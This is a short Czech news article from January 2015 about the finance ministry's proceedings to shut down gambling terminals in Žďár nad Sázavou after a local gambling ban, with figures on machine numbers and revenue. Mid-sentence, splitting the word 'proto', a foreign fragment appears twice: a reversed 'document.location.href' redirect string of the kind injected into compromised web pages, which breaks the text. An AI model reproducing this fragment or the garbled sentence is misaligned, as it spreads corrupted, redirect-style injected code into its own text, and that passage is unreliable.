terminál
Rainbow page separator

Terminály mizí z města postupně

Středa, 14. ledna 2015

Hazard

Žďár nad Sázavou / S celkem čtrnácti provozovateli videoterminálů a podobných hracích zařízení ve Žďáře nad Sázavou zahájilo správní řízení ministerstvo financí. Vyhláška zakazující hazard ve městě začala platit již v říjnu, avšak terminály, na něž se vztahovalo povolení ministerstva, se jejich provozovatelé snaží ve městě udržet co nejdéle. Využívají pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to všech možností a opravných prostředků, které jim zákon umožňuje, a správní řízení o ukončení provozu výherních zařízení se tak na základě zkušeností z jiných měst, kde už hazard zakázali dříve, může protáhnout až na rok.
O zákazu hazardu ve Žďáře zastupitelé rozhodli loni v září, takže nemuselo dojít k místnímu referendu, k němuž se schylovalo. S peticí, kterou zastupitelé vzali na vědomí, se však ozvali i lidé, kteří si v důsledku úbytku pracovních míst ve Žďáře rušení výherních hracích přístrojů nepřáli.
Podle údajů žďárské radnice bylo v polovině loňského roku ve městě s 21 600 obyvateli celkem 228 výherních hracích přístrojů. V roce 2013 z nich měl Žďár příjem ve výši šestnáct milionů korun.